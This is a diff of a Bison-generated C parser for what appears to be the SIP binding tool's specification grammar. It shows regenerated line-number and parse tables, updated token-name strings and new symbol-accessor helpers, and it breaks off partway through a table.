1166, 1233, 1247, +- 1248, 1251, 1252, 1253, 1257, 1261, 1270, 1279, 1288, 1289, +- 1292, 1307, 1307, 1344, 1345, 1348, 1349, 1352, 1352, 1381, +- 1382, 1385, 1391, 1397, 1402, 1407, 1408, 1418, 1425, 1425, +- 1451, 1452, 1455, 1461, 1461, 1480, 1483, 1486, 1489, 1494, +- 1495, 1500, 1508, 1545, 1553, 1559, 1564, 1565, 1578, 1586, +- 1594, 1602, 1612, 1623, 1628, 1633, 1634, 1644, 1651, 1662, +- 1667, 1672, 1673, 1683, 1690, 1702, 1707, 1712, 1713, 1723, +- 1730, 1750, 1755, 1760, 1761, 1771, 1778, 1782, 1787, 1788, +- 1798, 1801, 1804, 1818, 1836, 1841, 1846, 1847, 1857, 1864, +- 1868, 1873, 1874, 1884, 1887, 1890, 1904, 1915, 1925, 1925, +- 1938, 1943, 1944, 1961, 1973, 1991, 2003, 2015, 2027, 2039, +- 2051, 2063, 2082, 2086, 2091, 2092, 2102, 2105, 2108, 2111, +- 2125, 2126, 2142, 2145, 
2148, 2157, 2163, 2168, 2169, 2180, +- 2186, 2194, 2202, 2208, 2213, 2218, 2219, 2229, 2236, 2239, +- 2244, 2247, 2252, 2255, 2260, 2266, 2272, 2278, 2283, 2288, +- 2293, 2298, 2303, 2308, 2313, 2318, 2323, 2328, 2333, 2338, +- 2344, 2349, 2355, 2361, 2367, 2373, 2379, 2384, 2390, 2396, +- 2401, 2407, 2413, 2419, 2424, 2425, 2435, 2442, 2526, 2530, +- 2536, 2541, 2542, 2553, 2559, 2567, 2570, 2573, 2582, 2588, +- 2593, 2594, 2605, 2611, 2622, 2627, 2630, 2631, 2641, 2641, +- 2665, 2668, 2671, 2676, 2679, 2684, 2687, 2692, 2693, 2696, +- 2697, 2700, 2701, 2702, 2746, 2747, 2750, 2751, 2754, 2757, +- 2762, 2763, 2781, 2784, 2787, 2790, 2793, 2796, 2801, 2804, +- 2807, 2810, 2813, 2816, 2819, 2824, 2839, 2842, 2847, 2853, +- 2856, 2857, 2865, 2870, 2873, 2878, 2887, 2897, 2900, 2904, +- 2908, 2912, 2916, 2920, 2926, 2931, 2937, 2955, 2977, 3016, +- 3022, 3016, 3066, 3066, 3092, 3097, 3103, 3097, 3143, 3144, +- 3147, 3148, 3151, 3203, 3206, 3209, 3212, 3217, 3220, 3225, +- 3226, 3227, 3230, 3231, 3232, 3233, 3234, 3235, 3236, 3237, +- 3238, 3239, 3240, 3251, 3255, 3259, 3270, 3281, 3292, 3303, +- 3314, 3325, 3336, 3347, 3358, 3369, 3380, 3391, 3392, 3393, +- 3394, 3405, 3416, 3427, 3434, 3441, 3448, 3457, 3470, 3475, +- 3476, 3488, 3495, 3502, 3511, 3515, 3520, 3521, 3531, 3534, +- 3537, 3551, 3552, 3555, 3558, 3564, 3564, 3565, 3568, 3634, +- 3634, 3635, 3638, 3684, 3687, 3687, 3698, 3701, 3701, 3713, +- 3731, 3751, 3795, 3876, 3877, 3878, 3879, 3880, 3881, 3882, +- 3883, 3884, 3885, 3886, 3887, 3888, 3889, 3890, 3891, 3892, +- 3893, 3894, 3895, 3896, 3897, 3898, 3899, 3900, 3901, 3902, +- 3903, 3904, 3907, 3910, 3915, 3918, 3923, 3926, 3934, 3937, +- 3943, 3947, 3959, 3963, 3969, 3973, 3996, 4000, 4006, 4009, +- 4014, 4017, 4022, 4025, 4030, 4033, 4038, 4090, 4095, 4101, +- 4124, 4136, 4148, 4160, 4179, 4190, 4207, 4224, 4233, 4240, +- 4240, 4241, 4241, 4242, 4246, 4246, 4247, 4251, 4252, 4256, +- 4256, 4257, 4260, 4315, 4321, 4326, 4327, 4339, 4342, 4345, +- 4360, 
4375, 4392, 4397, 4411, 4521, 4524, 4532, 4535, 4538, +- 4543, 4551, 4562, 4577, 4581, 4585, 4589, 4593, 4597, 4601, +- 4605, 4609, 4613, 4617, 4621, 4625, 4629, 4633, 4637, 4641, +- 4645, 4649, 4653, 4657, 4661, 4665, 4669, 4673, 4677, 4681, +- 4685, 4691, 4697, 4713, 4716, 4724, 4730, 4737 ++ 0, 575, 575, 576, 579, 579, 598, 599, 600, 601, ++ 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, ++ 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, ++ 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, ++ 632, 633, 634, 635, 638, 639, 640, 641, 642, 643, ++ 644, 645, 646, 647, 648, 649, 662, 668, 673, 678, ++ 679, 689, 696, 702, 707, 712, 713, 723, 730, 739, ++ 744, 749, 750, 760, 767, 778, 783, 788, 789, 799, ++ 806, 835, 840, 845, 846, 856, 863, 889, 897, 902, ++ 903, 914, 920, 928, 975, 979, 1086, 1091, 1092, 1103, ++ 1106, 1109, 1123, 1139, 1144, 1144, 1167, 1167, 1234, 1248, ++ 1249, 1252, 1253, 1254, 1258, 1262, 1271, 1280, 1289, 1290, ++ 1293, 1308, 1308, 1345, 1346, 1349, 1350, 1353, 1353, 1382, ++ 1383, 1386, 1392, 1398, 1403, 1408, 1409, 1419, 1426, 1426, ++ 1452, 1453, 1456, 1462, 1462, 1481, 1484, 1487, 1490, 1495, ++ 1496, 1501, 1509, 1546, 1554, 1560, 1565, 1566, 1579, 1587, ++ 1595, 1603, 1613, 1624, 1629, 1634, 1635, 1645, 1652, 1663, ++ 1668, 1673, 1674, 1684, 1691, 1703, 1708, 1713, 1714, 1724, ++ 1731, 1751, 1756, 1761, 1762, 1772, 1779, 1783, 1788, 1789, ++ 1799, 1802, 1805, 1819, 1837, 1842, 1847, 1848, 1858, 1865, ++ 1869, 1874, 1875, 1885, 1888, 1891, 1905, 1917, 1927, 1927, ++ 1941, 1946, 1947, 1965, 1978, 1997, 2010, 2023, 2036, 2049, ++ 2062, 2075, 2088, 2108, 2112, 2117, 2118, 2128, 2131, 2134, ++ 2137, 2151, 2152, 2168, 2171, 2174, 2183, 2189, 2194, 2195, ++ 2206, 2212, 2220, 2228, 2234, 2239, 2244, 2245, 2255, 2262, ++ 2265, 2270, 2273, 2278, 2281, 2286, 2292, 2298, 2304, 2309, ++ 2314, 2319, 2324, 2329, 2334, 2339, 2344, 2349, 2354, 2359, ++ 2364, 2370, 2375, 2381, 2387, 2393, 2399, 2405, 2410, 2416, ++ 2422, 2427, 2433, 2439, 2445, 2450, 
2451, 2461, 2468, 2552, ++ 2556, 2562, 2567, 2568, 2579, 2585, 2593, 2596, 2599, 2608, ++ 2614, 2619, 2620, 2631, 2637, 2648, 2653, 2656, 2657, 2667, ++ 2667, 2691, 2694, 2697, 2702, 2705, 2710, 2713, 2718, 2719, ++ 2722, 2723, 2726, 2727, 2728, 2772, 2773, 2776, 2777, 2780, ++ 2783, 2788, 2789, 2807, 2810, 2813, 2816, 2819, 2822, 2827, ++ 2830, 2833, 2836, 2839, 2842, 2845, 2850, 2865, 2868, 2873, ++ 2879, 2882, 2883, 2891, 2896, 2899, 2904, 2913, 2923, 2926, ++ 2930, 2934, 2938, 2942, 2946, 2952, 2957, 2963, 2981, 3003, ++ 3042, 3048, 3042, 3092, 3092, 3118, 3123, 3129, 3123, 3169, ++ 3170, 3173, 3174, 3177, 3229, 3232, 3235, 3238, 3243, 3246, ++ 3251, 3252, 3253, 3256, 3257, 3258, 3259, 3260, 3261, 3262, ++ 3263, 3264, 3265, 3266, 3277, 3281, 3285, 3296, 3307, 3318, ++ 3329, 3340, 3351, 3362, 3373, 3384, 3395, 3406, 3417, 3418, ++ 3419, 3420, 3431, 3442, 3453, 3460, 3467, 3474, 3483, 3496, ++ 3501, 3502, 3514, 3521, 3528, 3537, 3541, 3546, 3547, 3557, ++ 3560, 3563, 3577, 3578, 3581, 3584, 3590, 3590, 3591, 3594, ++ 3660, 3660, 3661, 3664, 3710, 3713, 3713, 3724, 3727, 3727, ++ 3739, 3757, 3777, 3821, 3902, 3903, 3904, 3905, 3906, 3907, ++ 3908, 3909, 3910, 3911, 3912, 3913, 3914, 3915, 3916, 3917, ++ 3918, 3919, 3920, 3921, 3922, 3923, 3924, 3925, 3926, 3927, ++ 3928, 3929, 3930, 3933, 3936, 3941, 3944, 3949, 3952, 3960, ++ 3963, 3969, 3973, 3985, 3989, 3995, 3999, 4022, 4026, 4032, ++ 4035, 4040, 4043, 4048, 4051, 4056, 4059, 4064, 4116, 4121, ++ 4127, 4150, 4162, 4174, 4186, 4205, 4216, 4233, 4250, 4259, ++ 4266, 4266, 4267, 4267, 4268, 4272, 4272, 4273, 4277, 4278, ++ 4282, 4282, 4283, 4286, 4341, 4347, 4352, 4353, 4365, 4368, ++ 4371, 4386, 4401, 4418, 4423, 4437, 4547, 4550, 4558, 4561, ++ 4564, 4569, 4577, 4588, 4603, 4607, 4611, 4615, 4619, 4623, ++ 4627, 4631, 4635, 4639, 4643, 4647, 4651, 4655, 4659, 4663, ++ 4667, 4671, 4675, 4679, 4683, 4687, 4691, 4695, 4699, 4703, ++ 4707, 4711, 4717, 4723, 4739, 4742, 4750, 4756, 4763 + }; + #endif + +-#if YYDEBUG 
|| YYERROR_VERBOSE || YYTOKEN_TABLE ++/** Accessing symbol of state STATE. */ ++#define YY_ACCESSING_SYMBOL(State) YY_CAST (yysymbol_kind_t, yystos[State]) ++ ++#if YYDEBUG || 0 ++/* The user-facing name of the symbol whose (internal) number is ++ YYSYMBOL. No bounds checking. */ ++static const char *yysymbol_name (yysymbol_kind_t yysymbol) YY_ATTRIBUTE_UNUSED; ++ + /* YYTNAME[SYMBOL-NUM] -- String name of the symbol SYMBOL-NUM. + First, the terminals, then, starting at YYNTOKENS, nonterminals. */ + static const char *const yytname[] = + { +- "$end", "error", "$undefined", "TK_API", "TK_AUTOPYNAME", +- "TK_DEFDOCSTRFMT", "TK_DEFDOCSTRSIG", "TK_DEFENCODING", "TK_PLUGIN", +- "TK_VIRTERRORHANDLER", "TK_EXPTYPEHINTCODE", "TK_TYPEHINTCODE", +- "TK_DOCSTRING", "TK_DOC", "TK_EXPORTEDDOC", "TK_EXTRACT", "TK_MAKEFILE", +- "TK_ACCESSCODE", "TK_GETCODE", "TK_SETCODE", "TK_PREINITCODE", +- "TK_INITCODE", "TK_POSTINITCODE", "TK_FINALCODE", "TK_UNITCODE", +- "TK_UNITPOSTINCLUDECODE", "TK_MODCODE", "TK_TYPECODE", "TK_PREPYCODE", +- "TK_COPYING", "TK_MAPPEDTYPE", "TK_CODELINE", "TK_IF", "TK_END", +- "TK_NAME_VALUE", "TK_PATH_VALUE", "TK_STRING_VALUE", ++ "\"end of file\"", "error", "\"invalid token\"", "TK_API", ++ "TK_AUTOPYNAME", "TK_DEFDOCSTRFMT", "TK_DEFDOCSTRSIG", "TK_DEFENCODING", ++ "TK_PLUGIN", "TK_VIRTERRORHANDLER", "TK_EXPTYPEHINTCODE", ++ "TK_TYPEHINTCODE", "TK_DOCSTRING", "TK_DOC", "TK_EXPORTEDDOC", ++ "TK_EXTRACT", "TK_MAKEFILE", "TK_ACCESSCODE", "TK_GETCODE", "TK_SETCODE", ++ "TK_PREINITCODE", "TK_INITCODE", "TK_POSTINITCODE", "TK_FINALCODE", ++ "TK_UNITCODE", "TK_UNITPOSTINCLUDECODE", "TK_MODCODE", "TK_TYPECODE", ++ "TK_PREPYCODE", "TK_COPYING", "TK_MAPPEDTYPE", "TK_CODELINE", "TK_IF", ++ "TK_END", "TK_NAME_VALUE", "TK_PATH_VALUE", "TK_STRING_VALUE", + "TK_VIRTUALCATCHERCODE", "TK_TRAVERSECODE", "TK_CLEARCODE", + "TK_GETBUFFERCODE", "TK_RELEASEBUFFERCODE", "TK_READBUFFERCODE", + "TK_WRITEBUFFERCODE", "TK_SEGCOUNTCODE", "TK_CHARBUFFERCODE", +@@ -1264,13 +1217,13 @@ 
static const char *const yytname[] = + "TK_DEFSUPERTYPE", "TK_PROPERTY", "TK_HIDE_NS", "TK_FORMAT", "TK_GET", + "TK_ID", "TK_KWARGS", "TK_LANGUAGE", "TK_LICENSEE", "TK_NAME", + "TK_OPTIONAL", "TK_ORDER", "TK_REMOVELEADING", "TK_SET", "TK_SIGNATURE", +- "TK_TIMESTAMP", "TK_TYPE", "TK_USEARGNAMES", "TK_USELIMITEDAPI", +- "TK_ALLRAISEPYEXC", "TK_CALLSUPERINIT", "TK_DEFERRORHANDLER", +- "TK_VERSION", "'('", "')'", "','", "'='", "'{'", "'}'", "';'", "'!'", +- "'-'", "'+'", "'*'", "'/'", "'&'", "'|'", "'~'", "'<'", "'>'", "':'", +- "'['", "']'", "'%'", "'^'", "$accept", "specification", "statement", +- "@1", "modstatement", "nsstatement", "defdocstringfmt", +- "defdocstringfmt_args", "defdocstringfmt_arg_list", ++ "TK_TIMESTAMP", "TK_TYPE", "TK_USEARGNAMES", "TK_PYSSIZETCLEAN", ++ "TK_USELIMITEDAPI", "TK_ALLRAISEPYEXC", "TK_CALLSUPERINIT", ++ "TK_DEFERRORHANDLER", "TK_VERSION", "'('", "')'", "','", "'='", "'{'", ++ "'}'", "';'", "'!'", "'-'", "'+'", "'*'", "'/'", "'&'", "'|'", "'~'", ++ "'<'", "'>'", "':'", "'['", "']'", "'%'", "'^'", "$accept", ++ "specification", "statement", "$@1", "modstatement", "nsstatement", ++ "defdocstringfmt", "defdocstringfmt_args", "defdocstringfmt_arg_list", + "defdocstringfmt_arg", "defdocstringsig", "defdocstringsig_args", + "defdocstringsig_arg_list", "defdocstringsig_arg", "defencoding", + "defencoding_args", "defencoding_arg_list", "defencoding_arg", "plugin", +@@ -1278,13 +1231,13 @@ static const char *const yytname[] = + "veh_args", "veh_arg_list", "veh_arg", "api", "api_args", "api_arg_list", + "api_arg", "exception", "baseexception", "exception_body", + "exception_body_directives", "exception_body_directive", "raisecode", +- "mappedtype", "@2", "mappedtypetmpl", "@3", "mtdefinition", "mtbody", +- "mtline", "mtfunction", "namespace", "@4", "optnsbody", "nsbody", +- "platforms", "@5", "platformlist", "platform", "feature", "feature_args", +- "feature_arg_list", "feature_arg", "timeline", "@6", "qualifierlist", +- "qualifiername", 
"ifstart", "@7", "oredqualifiers", "qualifiers", +- "ifend", "license", "license_args", "license_arg_list", "license_arg", +- "defmetatype", "defmetatype_args", "defmetatype_arg_list", ++ "mappedtype", "$@2", "mappedtypetmpl", "$@3", "mtdefinition", "mtbody", ++ "mtline", "mtfunction", "namespace", "$@4", "optnsbody", "nsbody", ++ "platforms", "$@5", "platformlist", "platform", "feature", ++ "feature_args", "feature_arg_list", "feature_arg", "timeline", "$@6", ++ "qualifierlist", "qualifiername", "ifstart", "$@7", "oredqualifiers", ++ "qualifiers", "ifend", "license", "license_args", "license_arg_list", ++ "license_arg", "defmetatype", "defmetatype_args", "defmetatype_arg_list", + "defmetatype_arg", "defsupertype", "defsupertype_args", + "defsupertype_arg_list", "defsupertype_arg", "hiddenns", "hiddenns_args", + "hiddenns_arg_list", "hiddenns_arg", "consmodule", "consmodule_args", +@@ -1292,7 +1245,7 @@ static const char *const yytname[] = + "consmodule_body_directives", "consmodule_body_directive", "compmodule", + "compmodule_args", "compmodule_arg_list", "compmodule_arg", + "compmodule_body", "compmodule_body_directives", +- "compmodule_body_directive", "module", "module_args", "@8", ++ "compmodule_body_directive", "module", "module_args", "$@8", + "module_arg_list", "module_arg", "module_body", "module_body_directives", + "module_body_directive", "dottedname", "optnumber", "include", + "include_args", "include_arg_list", "include_arg", "optinclude", +@@ -1307,1011 +1260,950 @@ static const char *const yytname[] = + "autopyname_args", "autopyname_arg_list", "autopyname_arg", "docstring", + "docstring_args", "docstring_arg_list", "docstring_arg", "optdocstring", + "extract", "extract_args", "extract_arg_list", "extract_arg", "makefile", +- "codeblock", "codelines", "enum", "@9", "optenumkey", "optfilename", ++ "codeblock", "codelines", "enum", "$@9", "optenumkey", "optfilename", + "optname", "optenumbody", "enumbody", "enumline", "optcomma", + "optenumassign", 
"optassign", "expr", "binop", "optunop", "value", + "optcast", "scopedname", "scopednamehead", "scopepart", "bool_value", +- "simplevalue", "exprlist", "typedef", "struct", "@10", "@11", +- "classtmpl", "@12", "template", "class", "@13", "@14", "superclasses", ++ "simplevalue", "exprlist", "typedef", "struct", "$@10", "$@11", ++ "classtmpl", "$@12", "template", "class", "$@13", "$@14", "superclasses", + "superlist", "superclass", "class_access", "optclassbody", "classbody", + "classline", "property", "property_args", "property_arg_list", + "property_arg", "property_body", "property_body_directives", +- "property_body_directive", "name_or_string", "optslot", "dtor", "@15", +- "dtor_decl", "ctor", "@16", "simplector", "optctorsig", "@17", "optsig", +- "@18", "function", "operatorname", "optconst", "optfinal", "optabstract", +- "optflags", "flaglist", "flag", "flagvalue", "virtualcallcode", +- "methodcode", "premethodcode", "virtualcatchercode", "arglist", +- "rawarglist", "argvalue", "varmember", "@19", "@20", "simple_varmem", +- "@21", "varmem", "member", "@22", "variable", "variable_body", +- "variable_body_directives", "variable_body_directive", "cpptype", +- "argtype", "optref", "deref", "basetype", "cpptypelist", "optexceptions", +- "exceptionlist", 0 ++ "property_body_directive", "name_or_string", "optslot", "dtor", "$@15", ++ "dtor_decl", "ctor", "$@16", "simplector", "optctorsig", "$@17", ++ "optsig", "$@18", "function", "operatorname", "optconst", "optfinal", ++ "optabstract", "optflags", "flaglist", "flag", "flagvalue", ++ "virtualcallcode", "methodcode", "premethodcode", "virtualcatchercode", ++ "arglist", "rawarglist", "argvalue", "varmember", "$@19", "$@20", ++ "simple_varmem", "$@21", "varmem", "member", "$@22", "variable", ++ "variable_body", "variable_body_directives", "variable_body_directive", ++ "cpptype", "argtype", "optref", "deref", "basetype", "cpptypelist", ++ "optexceptions", "exceptionlist", YY_NULLPTR + }; ++ ++static const char * 
++yysymbol_name (yysymbol_kind_t yysymbol) ++{ ++ return yytname[yysymbol]; ++} + #endif + +-# ifdef YYPRINT +-/* YYTOKNUM[YYLEX-NUM] -- Internal token number corresponding to +- token YYLEX-NUM. */ +-static const yytype_uint16 yytoknum[] = +-{ +- 0, 256, 257, 258, 259, 260, 261, 262, 263, 264, +- 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, +- 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, +- 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, +- 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, +- 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, +- 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, +- 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, +- 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, +- 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, +- 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, +- 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, +- 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, +- 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, +- 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, +- 405, 406, 40, 41, 44, 61, 123, 125, 59, 33, +- 45, 43, 42, 47, 38, 124, 126, 60, 62, 58, +- 91, 93, 37, 94 +-}; +-# endif ++#define YYPACT_NINF (-840) + +-/* YYR1[YYN] -- Symbol number of symbol that rule YYN derives. 
*/ +-static const yytype_uint16 yyr1[] = +-{ +- 0, 174, 175, 175, 177, 176, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 178, 178, 178, 178, 178, 178, +- 178, 178, 178, 178, 179, 179, 179, 179, 179, 179, +- 179, 179, 179, 179, 179, 179, 180, 181, 181, 182, +- 182, 183, 184, 185, 185, 186, 186, 187, 188, 189, +- 189, 190, 190, 191, 192, 193, 193, 194, 194, 195, +- 196, 197, 197, 198, 198, 199, 200, 201, 201, 202, +- 202, 203, 203, 204, 205, 205, 206, 207, 207, 208, +- 208, 208, 208, 209, 211, 210, 213, 212, 214, 215, +- 215, 216, 216, 216, 216, 216, 216, 216, 216, 216, +- 217, 219, 218, 220, 220, 221, 221, 223, 222, 224, +- 224, 225, 226, 227, 227, 228, 228, 229, 231, 230, +- 232, 232, 233, 235, 234, 236, 236, 236, 236, 237, +- 237, 238, 239, 240, 240, 240, 241, 241, 242, 242, +- 242, 242, 243, 244, 244, 245, 245, 246, 247, 248, +- 248, 249, 249, 250, 251, 252, 252, 253, 253, 254, +- 255, 256, 256, 257, 257, 258, 259, 259, 260, 260, +- 261, 261, 261, 262, 263, 263, 264, 264, 265, 266, +- 266, 267, 267, 268, 268, 268, 269, 269, 271, 270, +- 270, 272, 272, 273, 273, 273, 273, 273, 273, 273, +- 273, 273, 274, 274, 275, 275, 276, 276, 276, 276, +- 277, 277, 278, 278, 279, 280, 280, 281, 281, 282, +- 282, 283, 284, 285, 285, 286, 286, 287, 288, 288, +- 289, 289, 290, 290, 291, 292, 293, 294, 295, 296, +- 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, +- 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, +- 317, 318, 319, 320, 321, 321, 322, 323, 324, 324, +- 324, 325, 325, 326, 326, 327, 327, 328, 329, 329, +- 330, 330, 331, 331, 332, 333, 334, 334, 336, 335, +- 337, 337, 337, 338, 338, 339, 339, 340, 340, 341, +- 341, 342, 342, 342, 343, 343, 344, 344, 345, 345, +- 346, 346, 347, 347, 347, 347, 347, 347, 348, 348, +- 348, 348, 348, 348, 348, 349, 350, 350, 351, 351, +- 352, 352, 353, 354, 354, 355, 355, 355, 355, 355, +- 355, 355, 355, 355, 356, 356, 356, 357, 357, 
359, +- 360, 358, 362, 361, 363, 365, 366, 364, 367, 367, +- 368, 368, 369, 370, 370, 370, 370, 371, 371, 372, +- 372, 372, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, +- 373, 373, 373, 373, 373, 373, 373, 374, 375, 376, +- 376, 377, 377, 377, 378, 378, 379, 379, 380, 380, +- 380, 381, 381, 382, 382, 384, 383, 383, 385, 387, +- 386, 386, 388, 389, 390, 389, 391, 392, 391, 393, +- 393, 393, 393, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 394, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 394, 394, 394, 394, 394, 394, 394, 394, +- 394, 394, 395, 395, 396, 396, 397, 397, 398, 398, +- 399, 399, 400, 400, 401, 401, 401, 401, 402, 402, +- 403, 403, 404, 404, 405, 405, 406, 407, 407, 407, +- 408, 408, 408, 408, 408, 408, 408, 408, 408, 410, +- 409, 411, 409, 409, 413, 412, 412, 414, 414, 416, +- 415, 415, 417, 418, 418, 419, 419, 420, 420, 420, +- 420, 420, 421, 421, 422, 423, 423, 424, 424, 424, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 425, 425, 425, 425, 425, 425, 425, 425, 425, +- 425, 426, 426, 427, 427, 428, 428, 428 +-}; ++#define yypact_value_is_default(Yyn) \ ++ ((Yyn) == YYPACT_NINF) + +-/* YYR2[YYN] -- Number of symbols composing right hand side of rule YYN. */ +-static const yytype_uint8 yyr2[] = ++#define YYTABLE_NINF (-564) ++ ++#define yytable_value_is_error(Yyn) \ ++ 0 ++ ++/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing ++ STATE-NUM. 
*/ ++static const yytype_int16 yypact[] = + { +- 0, 2, 1, 2, 0, 2, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, +- 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, +- 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, +- 3, 1, 3, 1, 3, 3, 2, 2, 3, 1, +- 3, 3, 3, 5, 0, 3, 4, 1, 2, 1, +- 1, 1, 1, 2, 0, 5, 0, 6, 4, 1, +- 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, +- 14, 0, 5, 0, 3, 1, 2, 0, 5, 1, +- 2, 1, 2, 1, 3, 1, 3, 3, 0, 5, +- 1, 2, 1, 0, 5, 1, 2, 3, 4, 1, +- 3, 1, 3, 0, 1, 3, 1, 3, 3, 3, +- 3, 3, 2, 1, 3, 1, 3, 3, 2, 1, +- 3, 1, 3, 3, 2, 1, 3, 1, 3, 3, +- 3, 1, 3, 1, 3, 3, 0, 4, 1, 2, +- 1, 1, 1, 3, 1, 3, 1, 3, 3, 0, +- 4, 1, 2, 1, 1, 1, 3, 3, 0, 3, +- 3, 1, 3, 3, 3, 3, 3, 3, 3, 3, +- 3, 3, 0, 4, 1, 2, 1, 1, 1, 1, +- 1, 1, 0, 1, 2, 1, 3, 1, 3, 3, +- 3, 2, 2, 1, 3, 1, 3, 3, 0, 2, +- 0, 2, 0, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 3, 1, 3, 3, 3, 0, 1, +- 3, 1, 3, 3, 3, 0, 1, 3, 1, 3, +- 1, 3, 3, 3, 4, 2, 1, 2, 0, 9, +- 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, +- 2, 1, 1, 4, 0, 1, 0, 2, 0, 2, +- 1, 3, 1, 1, 1, 1, 1, 1, 0, 1, +- 1, 1, 1, 1, 1, 3, 0, 3, 2, 1, +- 1, 3, 1, 1, 1, 1, 4, 2, 1, 1, +- 1, 1, 1, 1, 0, 1, 3, 6, 12, 0, +- 0, 8, 0, 3, 4, 0, 0, 8, 0, 2, +- 1, 3, 2, 0, 1, 1, 1, 0, 3, 0, +- 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, +- 2, 2, 2, 3, 3, 3, 2, 3, 3, 1, +- 3, 3, 3, 3, 0, 4, 1, 2, 1, 1, +- 1, 1, 1, 0, 1, 0, 3, 1, 11, 0, +- 3, 1, 11, 0, 0, 6, 0, 0, 7, 17, +- 7, 17, 16, 1, 1, 1, 1, 1, 1, 1, +- 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 3, 3, 1, 2, 2, 1, 2, 2, 2, +- 1, 2, 0, 1, 0, 1, 0, 2, 0, 3, +- 1, 3, 1, 3, 1, 5, 1, 1, 0, 2, +- 0, 2, 0, 2, 0, 2, 1, 0, 1, 3, +- 4, 4, 4, 3, 3, 6, 6, 3, 2, 0, +- 3, 0, 3, 1, 0, 3, 1, 1, 1, 0, +- 3, 1, 8, 0, 3, 1, 2, 1, 1, 2, +- 2, 2, 4, 3, 3, 0, 1, 0, 3, 2, +- 1, 4, 2, 2, 1, 1, 2, 1, 1, 2, +- 2, 3, 1, 1, 1, 2, 2, 1, 1, 1, +- 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 
+- 1, 1, 3, 0, 4, 0, 1, 3 ++ -840, 125, -840, 1218, -840, -840, 42, -2, 54, 55, ++ 58, 74, 100, 100, 100, 100, 75, 181, 100, 100, ++ 100, 100, 100, 100, 100, 100, 1542, 51, -840, -840, ++ 23, 228, 46, 100, 100, 100, 48, 238, 62, 64, ++ 84, 84, -840, -840, -840, 190, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, 218, ++ 224, 277, 279, 1542, -840, -840, 1506, 309, -840, -840, ++ 76, 59, 1506, 84, 203, -840, 66, 68, 53, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, 206, 285, -840, -840, -840, -840, ++ 359, -840, -840, -840, 79, -840, 297, -26, -840, -840, ++ 254, -840, -840, 268, -840, -840, 271, -840, -840, 281, ++ -840, -840, 286, 100, -840, -840, 257, -840, -840, -840, ++ -840, 101, 100, 395, -840, -840, -840, -840, -840, -840, ++ -840, -840, 84, 276, -840, -840, 158, -840, -840, -840, ++ 298, -840, -840, -840, -840, -840, -840, 338, 287, -840, ++ 335, 324, 342, -840, 331, 344, -840, -840, 18, -840, ++ -840, -840, 418, -840, -840, -840, 447, -840, 285, -840, ++ 77, -840, 378, 380, -840, 400, -840, -840, 171, 276, ++ 388, 390, 1506, 404, -840, -840, 406, -840, -840, 407, ++ -840, -840, 1506, 279, 1542, 482, -49, 234, 146, -840, ++ 391, 392, 169, -840, 393, 210, -840, 396, 214, -840, ++ 399, 222, -840, 401, 295, -840, 402, 306, -840, -840, ++ -840, -840, 403, 405, 312, -840, -840, -840, 100, -840, ++ 516, -840, 4, 408, 409, 316, -840, 410, 323, -840, ++ 412, 413, 414, 416, 417, 419, 420, 421, 422, 423, ++ 326, -840, 244, -840, 335, -840, -840, 424, 337, -840, ++ 267, -840, 425, 339, -840, 267, -840, 381, 381, -840, ++ 276, -840, 146, 276, 397, 426, 528, 529, 428, 341, ++ -840, 429, 430, 431, 432, 343, -840, -840, 1279, 84, ++ 276, -840, -21, 433, 349, -840, 435, 352, -840, 436, ++ 354, -840, -9, 
